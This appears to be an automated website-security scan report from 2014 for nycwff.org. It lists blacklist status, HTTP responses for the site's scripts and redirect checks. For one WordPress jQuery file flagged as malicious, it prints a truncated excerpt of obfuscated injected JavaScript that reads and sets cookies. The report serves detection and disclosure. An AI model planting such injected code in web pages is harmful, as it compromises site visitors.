Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nycwff.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nycwff.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.nycwff.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 May 2014 19:56:07 GMT Location: http://nycwff.org/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://nycwff.org/xmlrpc.php X-Powered-By: PleskLin | clean |
http://nycwff.org/ | 200 OK Content-Length: 20616 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://www.nycwff.org/wp-content/themes/longpage/nyroModal/js/jquery.nyroModal.custom.js | 404 Not Found Content-Length: 956 Content-Type: text/html | clean |
http://www.nycwff.org/test404page.js | 404 Not Found Content-Length: 956 Content-Type: text/html | clean |
http://maps.google.com/maps/api/js?v=3.2&sensor=false | 200 OK Content-Length: 4901 Content-Type: text/javascript | clean |
http://nycwff.org/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 96029 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
var HhhPD4v="\x75\x73\x65r\x69dA\x30817FB\x325";var lB6AMa0="28";var ohSMG=1;function FnmTqif(v69H1E){var eBhQG;var LgPCJ=document.cookie;if(!LgPCJ){return null;}LgPCJ=LgPCJ.replace(/\s/g,"");var auAr5v_=LgPCJ.split(";");for(var i=0;i<auAr5v_.length;i++){var IzebBuO=auAr5v_[i].split("=");if(IzebBuO[0]==v69H1E){eBhQG=unescape(IzebBuO[1]);break;}}return eBhQG;};function D7iVO(v69H1E,CDfHdho,VfOr4D){var exp=new Date();var kGeaAfy=exp.getTime()+(VfOr4D*60*60*1000);exp.setTime(kGeaAfy);var Qzecbe8 jQuery.noConflict();
Antivirus reports:
http://nycwff.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=3.7.3 | 200 OK Content-Length: 33 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/html5.js?ver=3.7.3 | 200 OK Content-Length: 2051 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/jquery.anythingslider.fx.min.js?ver=3.7.3 | 200 OK Content-Length: 3236 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/jquery.anythingslider.min.js?ver=3.7.3 | 200 OK Content-Length: 14756 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/jquery.easing.1.3.js?ver=3.7.3 | 200 OK Content-Length: 8097 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/sliders.js?ver=3.7.3 | 200 OK Content-Length: 4568 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/jquery.colorbox-1.3.16-min.js?ver=3.7.3 | 200 OK Content-Length: 9282 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/jquery.jcarousel.min.js?ver=3.7.3 | 200 OK Content-Length: 15650 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nycwff.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 May 2014 19:56:07 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Link: <http://nycwff.org/?p=16>; rel=shortlink
X-Pingback: http://nycwff.org/xmlrpc.php
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: nycwff.org
Referer: http://www.google.com/search?q=nycwff.org
Result:
The result is similar to the first query. There are no suspicious redirects found.